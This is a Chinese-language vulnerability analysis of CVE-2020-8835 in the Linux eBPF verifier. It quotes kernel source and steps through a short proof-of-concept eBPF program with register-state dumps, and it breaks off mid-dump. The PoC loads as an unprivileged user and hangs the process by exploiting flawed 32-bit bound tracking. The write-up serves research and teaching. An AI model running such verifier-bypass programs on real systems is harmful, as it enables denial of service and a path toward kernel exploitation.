CVE-2020-8835:Linux eBPF模块verifier组件漏洞分析

CVE-2020-8835:Linux eBPF模块verifier组件漏洞分析

 

eBPF简介

bpf系统调用执行一系列与extended Berkeley Packet Filters相关的操作,eBPF与传统的BPF相似,作用为 过滤网络包。对于eBPF和传统的BPF来说,为了确保它们进行的操作不会损伤运行时的系统,内核会在加载程序之前静态地分析它们。

简而言之,eBPF可以加载数据过滤代码到内核,并在进行相关操作的时候触发代码

通常见到的seccomp沙箱就是使用了eBPF模块

 

eBPF程序的载入

bpf_insn

bpf_insn是一个结构体,代表一条eBPF指令

struct bpf_insn {
__u8    code;        /* opcode */
__u8    dst_reg:4;    /* dest register */
__u8    src_reg:4;    /* source register */
__s16    off;        /* signed offset */
__s32    imm;        /* signed immediate constant */
};

每一个eBPF程序都是一个bpf_insn数组,使用bpf系统调用将其载入内核

具体每个字段的含义可以随之后的分析进行了解

bpf_prog_load

要将eBPF程序载入内核中,需要使用bpf系统调用

#define LOG_BUF_SIZE 65536
#define __NR_BPF 321
char bpf_log_buf[LOG_BUF_SIZE];
int bpf_prog_load(enum bpf_prog_type type,
const struct bpf_insn *insns, int insn_cnt,
const char *license)
{
union bpf_attr attr = {
.prog_type = type,
.insns = ptr_to_u64(insns),
.insn_cnt = insn_cnt,
.license = ptr_to_u64(license),
.log_buf = ptr_to_u64(bpf_log_buf),
.log_size = LOG_BUF_SIZE,
.log_level = 1,
};
return syscall(__NR_BPF, BPF_PROG_LOAD, &attr, sizeof(attr));
}

其中,type表示eBPF程序类型,不同类型的程序作用不同,例如当typeBPF_PROG_TYPE_SOCKET_FILTER时,表示该程序的作用是过滤进出口网络报文

insnsbpf_insn数组,表示该程序的指令

insn_cnt表示指令的条数

license必须为"GPL"

bpf_log_bpf中存储的是log信息,可以在程序载入内核之后打印它,能获取比较详细的验证时信息

load_prog

int load_prog()
{
struct bpf_insn prog[] = {
……
/*
指令……
*/
};
return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog)/sizeof(struct bpf_insn), "GPL");
}

如此这般,如何在用户态将一个eBPF程序载入内核就清楚了

 

漏洞分析

2020年3月30日,漏洞作者分享了他触发漏洞的一段eBPF程序[1]

0: (b7) r0 = 808464432
1: (7f) r0 >>= r0
2: (14) w0 -= 808464432
3: (07) r0 += 808464432
4: (b7) r1 = 808464432
5: (de) if w1 s<= w0 goto pc+0
6: (07) r0 += -2144337872
7: (14) w0 -= -1607454672
8: (25) if r0 > 0x30303030 goto pc+0
9: (76) if w0 s>= 0x303030 goto pc+2
10: (05) goto pc-1
11: (05) goto pc-1
12: (95) exit

这段程序触发会使当前进程空转,陷入死循环

乍一看,两个goto pc-1,当然会陷入死循环了,那这个Poc还有什么参考价值?

 

bpf_check

Linux v5.6-rc5的代码为例[2],源码于[4]下载

在使用bpf系统调用将eBPF程序载入内核时,内核会对载入的程序进行合法性检测,以此来保证程序的安全性

bpf_check中有两个主要的检查,一个是check_cfg,检查程序流程图,另一个是do_check_main,模拟执行程序来检查是否有非法操作

int bpf_check(struct bpf_prog **prog, union bpf_attr *attr,
union bpf_attr __user *uattr)
{
u64 start_time = ktime_get_ns();
struct bpf_verifier_env *env;
struct bpf_verifier_log *log;
int i, len, ret = -EINVAL;
bool is_priv;
……
ret = check_cfg(env);        <------------
if (ret < 0)
goto skip_full_check;
ret = do_check_subprogs(env);
ret = ret ?: do_check_main(env);    <-------------
……
}

check_cfg

static int check_cfg(struct bpf_verifier_env *env)
{
struct bpf_insn *insns = env->prog->insnsi;
int insn_cnt = env->prog->len;
int *insn_stack, *insn_state;
int ret = 0;
int i, t;
insn_state = env->cfg.insn_state = kvcalloc(insn_cnt, sizeof(int), GFP_KERNEL);
if (!insn_state)
return -ENOMEM;
insn_stack = env->cfg.insn_stack = kvcalloc(insn_cnt, sizeof(int), GFP_KERNEL);
if (!insn_stack) {
kvfree(insn_state);
return -ENOMEM;
}
insn_state[0] = DISCOVERED; /* mark 1st insn as discovered */
insn_stack[0] = 0; /* 0 is the first instruction */
env->cfg.cur_stack = 1;
peek_stack:
if (env->cfg.cur_stack == 0)
goto check_state;
t = insn_stack[env->cfg.cur_stack - 1];
if (BPF_CLASS(insns[t].code) == BPF_JMP ||
BPF_CLASS(insns[t].code) == BPF_JMP32) {
u8 opcode = BPF_OP(insns[t].code);
if (opcode == BPF_EXIT) {
goto mark_explored;
} else if (opcode == BPF_CALL) {
ret = push_insn(t, t + 1, FALLTHROUGH, env, false);
if (ret == 1)
goto peek_stack;
else if (ret < 0)
goto err_free;
if (t + 1 < insn_cnt)
init_explored_state(env, t + 1);
if (insns[t].src_reg == BPF_PSEUDO_CALL) {
init_explored_state(env, t);
ret = push_insn(t, t + insns[t].imm + 1, BRANCH,
env, false);
if (ret == 1)
goto peek_stack;
else if (ret < 0)
goto err_free;
}
} else if (opcode == BPF_JA) {
if (BPF_SRC(insns[t].code) != BPF_K) {
ret = -EINVAL;
goto err_free;
}
/* unconditional jump with single edge */
ret = push_insn(t, t + insns[t].off + 1,    <----------------- 1
FALLTHROUGH, env, true);
if (ret == 1)
goto peek_stack;
else if (ret < 0)
goto err_free;
/* unconditional jmp is not a good pruning point,
* but it's marked, since backtracking needs
* to record jmp history in is_state_visited().
*/
init_explored_state(env, t + insns[t].off + 1);
/* tell verifier to check for equivalent states
* after every call and jump
*/
if (t + 1 < insn_cnt)
init_explored_state(env, t + 1);
} else {
/* conditional jump with two edges */
init_explored_state(env, t);
ret = push_insn(t, t + 1, FALLTHROUGH, env, true);
if (ret == 1)
goto peek_stack;
else if (ret < 0)
goto err_free;
ret = push_insn(t, t + insns[t].off + 1, BRANCH, env, true);
if (ret == 1)
goto peek_stack;
else if (ret < 0)
goto err_free;
}
} else {
/* all other non-branch instructions with single
* fall-through edge
*/
ret = push_insn(t, t + 1, FALLTHROUGH, env, false);
if (ret == 1)
goto peek_stack;
else if (ret < 0)
goto err_free;
}
mark_explored:                <------------------------ 2
insn_state[t] = EXPLORED;
if (env->cfg.cur_stack-- <= 0) {
verbose(env, "pop stack internal bugn");
ret = -EFAULT;
goto err_free;
}
goto peek_stack;
check_state:                <------------------------ 3
for (i = 0; i < insn_cnt; i++) {
if (insn_state[i] != EXPLORED) {
verbose(env, "unreachable insn %dn", i);
ret = -EINVAL;
goto err_free;
}
}
ret = 0; /* cfg looks good */
err_free:
kvfree(insn_state);
kvfree(insn_stack);
env->cfg.insn_state = env->cfg.insn_stack = NULL;
return ret;
}

代码中,insn_state[i]代表第i条指令的状态,EXPLORED表示第i条指令已经被遍历过了

故箭头标记2处,表示标记一条指令被经过,然后再去取下一条指令

箭头3处,有一个for循环来检查所有指令是否已经被遍历过,如果有任何一条指令没有被遍历,则返回错误码,并在log中写入错误信息unreachable insn

因此,一个合格的eBPF程序要满足的第一个条件是,没有不可到达的指令

另外,也要注意箭头1处所指的函数pusn_insn

在程序中有opcodeBPF_JA,即 “无条件跳转” 的时候,会调用push_insn(t, t + insns[t].off + 1, FALLTHROUGH, env, true);来把下一条指令push入栈

这里,t是当前指令的索引,t+insns[t].off+1是下一条指令的索引

/* t, w, e - match pseudo-code above:
* t - index of current instruction
* w - next instruction
* e - edge
*/
static int push_insn(int t, int w, int e, struct bpf_verifier_env *env,
bool loop_ok)
{
int *insn_stack = env->cfg.insn_stack;
int *insn_state = env->cfg.insn_state;
if (e == FALLTHROUGH && insn_state[t] >= (DISCOVERED | FALLTHROUGH))
return 0;
if (e == BRANCH && insn_state[t] >= (DISCOVERED | BRANCH))
return 0;
if (w < 0 || w >= env->prog->len) {
verbose_linfo(env, t, "%d: ", t);
verbose(env, "jump out of range from insn %d to %dn", t, w);
return -EINVAL;
}
if (e == BRANCH)
/* mark branch target for state pruning */
init_explored_state(env, w);
if (insn_state[w] == 0) {
/* tree-edge */
insn_state[t] = DISCOVERED | e;
insn_state[w] = DISCOVERED;
if (env->cfg.cur_stack >= env->prog->len)
return -E2BIG;
insn_stack[env->cfg.cur_stack++] = w;
return 1;
} else if ((insn_state[w] & 0xF0) == DISCOVERED) {
if (loop_ok && env->allow_ptr_leaks)        <----------------- 1
return 0;
verbose_linfo(env, t, "%d: ", t);
verbose_linfo(env, w, "%d: ", w);
verbose(env, "back-edge from insn %d to %dn", t, w);
return -EINVAL;
} else if (insn_state[w] == EXPLORED) {
/* forward- or cross-edge */
insn_state[t] = DISCOVERED | e;
} else {
verbose(env, "insn state internal bugn");
return -EFAULT;
}
return 0;
}

箭头1处,如果insn_state[w]即下一条指令的状态为DISCOVERED,即当前的无条件跳转指令是往回跳的,就会进入箭头1这一分支。这时,loop_ok为1,如果env->allow_ptr_leaks为0的话,会报错back-edge,如果非0,则会继续运行

那么,env->allow_ptr_leaks是由什么影响的呢?

bpf_check函数中有这么两句

……
is_priv = capable(CAP_SYS_ADMIN);
……
env->allow_ptr_leaks = is_priv;
……

意味如果当前用户有CAP_SYS_ADMIN这个权限,那么env->allow_ptr_leaks就是1,否则就是0 。那么一般我们的用户不是root,没有这个权限,因此env->allow_ptr_leaks一般为0

这样的话,如果我们的eBPF程序中有往回跳转的指令,push_insn函数就会报错

因此,一个权限一般的合格的eBPF程序要满足的第二个条件是,没有往回跳转的指令

到这里,一般用户能正常通过check_cfg这一个函数所需要的条件就很明白了:

  • 没有不可到达的指令
  • 没有往回跳转的指令
  • 没有跳的太远超出指令范围的指令

而本文开始所展示的eBPF程序不符合第一个条件和第二个条件,那么它又是如何被载入内核的呢?

do_check_main

static int do_check_main(struct bpf_verifier_env *env)
{
int ret;
env->insn_idx = 0;
ret = do_check_common(env, 0);
if (!ret)
env->prog->aux->stack_depth = env->subprog_info[0].stack_depth;
return ret;
}

do_check_main函数中,调用了do_check_commin

static int do_check_common(struct bpf_verifier_env *env, int subprog)
{
……
ret = do_check(env);
……
}

且不管其他,我们主要注意的地方是这个do_check函数。在该函数中,内核会模拟执行被载入的程序,并逐条指令检查其合法性。何为不合法?eBPF程序的指令是包括内存存取相关指令的,因此对被存取的指针它会有类型以及范围的限定,而且限定非常严格。如果说限定的部分有漏洞,或者其他的原因导致限定失效,那么将会带来非常恐怖的后果。例如任意地址读写

在遇到具有分支,例如if xxx goto pc+x这样的语句,内核会检测if判断的条件是否恒成立。若判断为恒成立或者恒不成立,则只分析相应的那一分支,而另一分支则不进行分析。没有被分析到的指令被视为dead code

 

Poc分析

Poc的c文件链接在文末[3],注意要用普通用户执行Poc

0: (b7) r0 = 808464432
1: (7f) r0 >>= r0
2: (14) w0 -= 808464432
3: (07) r0 += 808464432
4: (b7) r1 = 808464432
5: (de) if w1 s<= w0 goto pc+0
6: (07) r0 += -2144337872
7: (14) w0 -= -1607454672
8: (25) if r0 > 0x30303030 goto pc+0
9: (76) if w0 s>= 0x303030 goto pc+2
10: (05) goto pc-1
11: (05) goto pc-1
12: (95) exit

首先先回答一个问题,为什么goto pc-1这样不能通过check_cfg的指令会被载入到内核中呢?

答案在bpf_check函数中

就在调用do_check_main那条语句的下方,还有几条代码

if (is_priv) {
if (ret == 0)
opt_hard_wire_dead_code_branches(env);
if (ret == 0)
ret = opt_remove_dead_code(env);
if (ret == 0)
ret = opt_remove_nops(env);
} else {
if (ret == 0)
sanitize_dead_code(env);
}

代码中,is_priv为何物我们已经了解,如果用户为root的话,is_priv为1,用户为具有一般权限的一般用户的话,其为0

关于is_priv为1的情况下内核究竟对eBPF程序做了什么不去细说,总结为一句话就是:内核将dead code全部替换为exit,即退出指令

那么接下来来看sanitize_dead_code函数

/* The verifier does more data flow analysis than llvm and will not
* explore branches that are dead at run time. Malicious programs can
* have dead code too. Therefore replace all dead at-run-time code
* with 'ja -1'.
*
* Just nops are not optimal, e.g. if they would sit at the end of the
* program and through another bug we would manage to jump there, then
* we'd execute beyond program memory otherwise. Returning exception
* code also wouldn't work since we can have subprogs where the dead
* code could be located.
*/
static void sanitize_dead_code(struct bpf_verifier_env *env)
{
struct bpf_insn_aux_data *aux_data = env->insn_aux_data;
struct bpf_insn trap = BPF_JMP_IMM(BPF_JA, 0, 0, -1);
struct bpf_insn *insn = env->prog->insnsi;
const int insn_cnt = env->prog->len;
int i;
for (i = 0; i < insn_cnt; i++) {
if (aux_data[i].seen)
continue;
memcpy(insn + i, &trap, sizeof(trap));
}
}

注释写的很清楚,这个函数会将所有的dead code改为goto pc-1,这样就能解释清楚Poc中10,11这两句不合法语句的来历了

内核在检查程序合法性的过程中,第9句在检查时被判断为恒成立,之后的检查便只检查了第12句,第10和第11句被视为dead code,在之后的sanitize_dead_code函数中被修改为goto pc-1。而没有想到的是,在实际执行的时候第9句实际上是恒不成立,因此就导致程序执行了goto pc-1。在实际执行跳转指令的时候,跳转的偏移会默认加1,因此实际上goto pc-1跳转到的地方不是自己的上一条,而是自己,这就导致程序空转,陷入死循环

那么为什么在检查的时候第九句的状态和实际执行时的状态不同呢?我们来一步步动态地分析一下

在分析之前,要先了解寄存器结构体

struct bpf_reg_state {
enum bpf_reg_type type;
union {
/* valid when type == PTR_TO_PACKET */
u16 range;
/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
*   PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;
u32 btf_id; /* for PTR_TO_BTF_ID */
/* Max size from any of the above. */
unsigned long raw;
};
s32 off;
u32 id;
u32 ref_obj_id;
/* For scalar types (SCALAR_VALUE), this represents our knowledge of
* the actual value.
* For pointer types, this represents the variable part of the offset
* from the pointed-to object, and is shared with all bpf_reg_states
* with the same id as us.
*/
struct tnum var_off;
/* Used to determine if any memory access using this register will
* result in a bad access.
* These refer to the same value as var_off, not necessarily the actual
* contents of the register.
*/
s64 smin_value; /* minimum possible (s64)value */
s64 smax_value; /* maximum possible (s64)value */
u64 umin_value; /* minimum possible (u64)value */
u64 umax_value; /* maximum possible (u64)value */
struct bpf_reg_state *parent;
u32 frameno;
s32 subreg_def;
enum bpf_reg_liveness live;
/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
bool precise;
};

理解该漏洞之前要先理解该结构体,要注意的一个字段是var_off,它是一个tnum结构体

/* tnum: tracked (or tristate) numbers
*
* A tnum tracks knowledge about the bits of a value.  Each bit can be either
* known (0 or 1), or unknown (x).  Arithmetic operations on tnums will
* propagate the unknown bits such that the tnum result represents all the
* possible results for possible values of the operands.
*/
struct tnum {
u64 value;
u64 mask;
};

tnum的注释没太懂,我的理解是:

  • mask为0的时候,表示该tnum是一个数字,值为value
  • mask非0的时候,表示一个范围,所有与mask进行与操作不为0的数字都在这个范围内,而此时的value只是该范围内的一个数字,并不精确

0: (b7) r0 = 808464432

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x30303030,
mask = 0x0
},
smin_value = 0x30303030,
smax_value = 0x30303030,
umin_value = 0x30303030,
umax_value = 0x30303030,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x0,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

此时,r0存储着一个确定的值,为0x30303030

>=%20r0″>1: (7f) r0 >>= r0

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x0,
mask = 0xffffffffffffffff
},
smin_value = 0x8000000000000000,
smax_value = 0x7fffffffffffffff,
umin_value = 0x0,
umax_value = 0xffffffffffffffff,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x0,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

可以看到var_off改变了,变为了一个完全不确定的值,且smin_value, smax_value, umin_value, umax_value都变为了相应范围的最大最小值

相应代码如下:

case BPF_RSH:
if (umax_val >= insn_bitness) {
/* Shifts greater than 31 or 63 are undefined.
* This includes shifts by a negative number.
*/
mark_reg_unknown(env, regs, insn->dst_reg);
break;
}
scalar_min_max_rsh(dst_reg, &src_reg);
break;

这里的umax_val就是r0->umax_val,在执行到这里的时候,为0x30303030,大于insn_bitness即64,所以就会标记寄存器为unknown

static void mark_reg_unknown(struct bpf_verifier_env *env,
struct bpf_reg_state *regs, u32 regno)
{
if (WARN_ON(regno >= MAX_BPF_REG)) {
verbose(env, "mark_reg_unknown(regs, %u)n", regno);
/* Something bad happened, let's kill all regs except FP */
for (regno = 0; regno < BPF_REG_FP; regno++)
__mark_reg_not_init(env, regs + regno);
return;
}
__mark_reg_unknown(env, regs + regno);
}
static void __mark_reg_unknown(const struct bpf_verifier_env *env,
struct bpf_reg_state *reg)
{
/*
* Clear type, id, off, and union(map_ptr, range) and
* padding between 'type' and union
*/
memset(reg, 0, offsetof(struct bpf_reg_state, var_off));
reg->type = SCALAR_VALUE;
reg->var_off = tnum_unknown;
reg->frameno = 0;
reg->precise = env->subprog_cnt > 1 || !env->allow_ptr_leaks ?
true : false;
__mark_reg_unbounded(reg);
}
static void __mark_reg_unbounded(struct bpf_reg_state *reg)
{
reg->smin_value = S64_MIN;
reg->smax_value = S64_MAX;
reg->umin_value = 0;
reg->umax_value = U64_MAX;
}

可以看到,mark_reg_unknown总共做了这些事:

  • reg->type = SCALAR_VALUE
  • reg->var_off = {0, 0xffffffffffffffff}
  • reg->smin_value = 0x8000000000000000
  • reg->smax_value = 0x7fffffffffffffff
  • reg->umin_value = 0
  • reg->umax_value = 0xffffffffffffffff

2: (14) w0 -= 808464432

主要代码位于adjust_scalar_min_max_vals函数中

static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg,
struct bpf_reg_state src_reg)
{
struct bpf_reg_state *regs = cur_regs(env);
u8 opcode = BPF_OP(insn->code);
bool src_known, dst_known;
s64 smin_val, smax_val;
u64 umin_val, umax_val;
u64 insn_bitness = (BPF_CLASS(insn->code) == BPF_ALU64) ? 64 : 32;
u32 dst = insn->dst_reg;
int ret;
if (insn_bitness == 32) {
/* Relevant for 32-bit RSH: Information can propagate towards
* LSB, so it isn't sufficient to only truncate the output to
* 32 bits.
*/
coerce_reg_to_size(dst_reg, 4);
coerce_reg_to_size(&src_reg, 4);
}
smin_val = src_reg.smin_value;
smax_val = src_reg.smax_value;
umin_val = src_reg.umin_value;
umax_val = src_reg.umax_value;
src_known = tnum_is_const(src_reg.var_off);
dst_known = tnum_is_const(dst_reg->var_off);
……
switch (opcode) {
……
case BPF_SUB:
ret = sanitize_val_alu(env, insn);
if (ret < 0) {
verbose(env, "R%d tried to sub from different pointers or scalarsn", dst);
return ret;
}
scalar_min_max_sub(dst_reg, &src_reg);
break;
……
}
if (BPF_CLASS(insn->code) != BPF_ALU64) {
/* 32-bit ALU ops are (32,32)->32 */
coerce_reg_to_size(dst_reg, 4);
}
__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
return 0;
}

由于该条指令使用的是32位寄存器,因此会先调用coerce_reg_to_size将寄存器转化为32位的

static void coerce_reg_to_size(struct bpf_reg_state *reg, int size)
{
u64 mask;
/* clear high bits in bit representation */
reg->var_off = tnum_cast(reg->var_off, size);
/* fix arithmetic bounds */
mask = ((u64)1 << (size * 8)) - 1;
if ((reg->umin_value & ~mask) == (reg->umax_value & ~mask)) {
reg->umin_value &= mask;
reg->umax_value &= mask;
} else {
reg->umin_value = 0;
reg->umax_value = mask;
}
reg->smin_value = reg->umin_value;
reg->smax_value = reg->umax_value;
}

转换完之后,寄存器的状态:

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x0,
mask = 0xffffffff
},
smin_value = 0x0,
smax_value = 0xffffffff,
umin_value = 0x0,
umax_value = 0xffffffff,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x3,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

之后开始做减法,此时的src_reg其实就是808464432,只不过是用一个暂时的寄存器将其保存了

相关代码如下:

static void scalar_min_max_sub(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
s64 smin_val = src_reg->smin_value;
s64 smax_val = src_reg->smax_value;
u64 umin_val = src_reg->umin_value;
u64 umax_val = src_reg->umax_value;
if (signed_sub_overflows(dst_reg->smin_value, smax_val) ||
signed_sub_overflows(dst_reg->smax_value, smin_val)) {
/* Overflow possible, we know nothing */
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
dst_reg->smin_value -= smax_val;    <-------------
dst_reg->smax_value -= smin_val;
}
if (dst_reg->umin_value < umax_val) {
/* Overflow possible, we know nothing */
dst_reg->umin_value = 0;            <-------------
dst_reg->umax_value = U64_MAX;
} else {
/* Cannot overflow (as long as bounds are consistent) */
dst_reg->umin_value -= umax_val;
dst_reg->umax_value -= umin_val;
}
dst_reg->var_off = tnum_sub(dst_reg->var_off, src_reg->var_off);
}

smin_value, smax_value, umin_value, umax_value都是0x30303030,经过两个箭头所指的代码,就将寄存器的状态变成了

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x0,
mask = 0xffffffff
},
smin_value = 0xffffffffcfcfcfd0,
smax_value = 0xcfcfcfcf,
umin_value = 0x0,
umax_value = 0xffffffff,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x3,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

执行完减法之后,因为BPF_CLASS不是BPF_ALU64,所以其又进行了一次coerce_reg_to_size,之后的寄存器状态如下:

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x0,
mask = 0xffffffff
},
smin_value = 0x0,
smax_value = 0xffffffff,
umin_value = 0x0,
umax_value = 0xffffffff,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x3,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

最后执行完__update_reg_bounds__reg_deduce_bounds__reg_bound_offset之后寄存器的状态都没有改变

第四句和第三句一样,是一个算术运算,其流程类似,故不分析

执行完第四句之后,寄存器的状态:

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x0,
mask = 0x1ffffffff
},
smin_value = 0x30303030,
smax_value = 0x13030302f,
umin_value = 0x30303030,
umax_value = 0x13030302f,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x0,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

5: (de) if w1 s<= w0 goto pc+0

执行这条语句之前,r0r1的状态分别为:

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x0,
mask = 0x1ffffffff
},
smin_value = 0x30303030,
smax_value = 0x13030302f,
umin_value = 0x30303030,
umax_value = 0x13030302f,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x0,
live = REG_LIVE_WRITTEN,
precise = 0x1
}
$r1 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x30303030,
mask = 0x0
},
smin_value = 0x30303030,
smax_value = 0x30303030,
umin_value = 0x30303030,
umax_value = 0x30303030,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x0,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

执行这条语句之后,r0的状态变为:

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x30303020,
mask = 0x10000001f
},
smin_value = 0x30303030,
smax_value = 0x13030302f,
umin_value = 0x30303030,
umax_value = 0x13030302f,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x0,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

下面来解释下为什么会有这样的变化

在遇到跳转指令的时候,会调用check_cond_jmp_op来检查该指令

在该函数中,由于r0不是一个确定的数字,因此会调用reg_set_min_max_inv来设置寄存器的最大最小值

static void reg_set_min_max_inv(struct bpf_reg_state *true_reg,
struct bpf_reg_state *false_reg, u64 val,
u8 opcode, bool is_jmp32)
{
s64 sval;
if (__is_pointer_value(false, false_reg))
return;
val = is_jmp32 ? (u32)val : val;
sval = is_jmp32 ? (s64)(s32)val : (s64)val;
switch (opcode) {
……
case BPF_JSLE:
case BPF_JSLT:
{
s64 false_smax = opcode == BPF_JSLT ? sval    : sval - 1;
s64 true_smin = opcode == BPF_JSLT ? sval + 1 : sval;
if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
break;
false_reg->smax_value = min(false_reg->smax_value, false_smax);
true_reg->smin_value = max(true_reg->smin_value, true_smin);
break;
}
default:
break;
}
__reg_deduce_bounds(false_reg);
__reg_deduce_bounds(true_reg);
/* We might have learned some bits from the bounds. */
__reg_bound_offset(false_reg);
__reg_bound_offset(true_reg);
if (is_jmp32) {            <----------------------
__reg_bound_offset32(false_reg);    <-------------------
__reg_bound_offset32(true_reg);        <-------------------
}
/* Intersecting with the old var_off might have improved our bounds
* slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.
*/
__update_reg_bounds(false_reg);
__update_reg_bounds(true_reg);
}

这里的false_regtrue_reg表示两种状态,即该if不成立时的regif成立时的reg

漏洞所处代码就在箭头所指的地方,这里仅跟进false_reg

先说明执行__reg_bound_offset32函数之前,false_reg的状态

$false_reg = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x0,
mask = 0x1ffffffff
},
smin_value = 0x30303030,
smax_value = 0x13030302f,
umin_value = 0x30303030,
umax_value = 0x13030302f,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x0,
live = REG_LIVE_WRITTEN,
precise = 0x1
}
static void __reg_bound_offset32(struct bpf_reg_state *reg)
{
u64 mask = 0xffffFFFF;
struct tnum range = tnum_range(reg->umin_value & mask,
reg->umax_value & mask);
struct tnum lo32 = tnum_cast(reg->var_off, 4);
struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);
reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
}

该函数执行完之后,寄存器的状态变为:

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0x30303020,
mask = 0x10000001f
},
smin_value = 0x30303030,
smax_value = 0x13030302f,
umin_value = 0x30303030,
umax_value = 0x13030302f,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x0,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

再之后,执行__update_reg_bounds(false_reg)之后:

static void __update_reg_bounds(struct bpf_reg_state *reg)
{
/* min signed is max(sign bit) | min(other bits) */
reg->smin_value = max_t(s64, reg->smin_value,
reg->var_off.value | (reg->var_off.mask & S64_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->smax_value = min_t(s64, reg->smax_value,
reg->var_off.value | (reg->var_off.mask & S64_MAX));
reg->umin_value = max(reg->umin_value, reg->var_off.value);
reg->umax_value = min(reg->umax_value,
reg->var_off.value | reg->var_off.mask);
}

reg不变,这里可以推导一下

6: (07) r0 += -2144337872

执行完这一句之后,寄存器状态:

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0xb0603040,
mask = 0xffffffff0000003f
},
smin_value = 0xffffffffb0603060,
smax_value = 0xb060305f,
umin_value = 0x0,
umax_value = 0xffffffffffffffff,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x0,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

7: (14) w0 -= -1607454672

执行这一句的时候,先会用coerce_reg_to_size把寄存器转换为32位

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
map_ptr = 0x0 <fixed_percpu_data>,
btf_id = 0x0,
raw = 0x0
},
off = 0x0,
id = 0x0,
ref_obj_id = 0x0,
var_off = {
value = 0xb0603040,
mask = 0x3f
},
smin_value = 0x0,
smax_value = 0xffffffff,
umin_value = 0x0,
umax_value = 0xffffffff,
parent = 0x0 <fixed_percpu_data>,
frameno = 0x0,
subreg_def = 0x8,
live = REG_LIVE_WRITTEN,
precise = 0x1
}

然后再做减法并改变var_off

$r0 = {
type = SCALAR_VALUE,
{
range = 0x0,
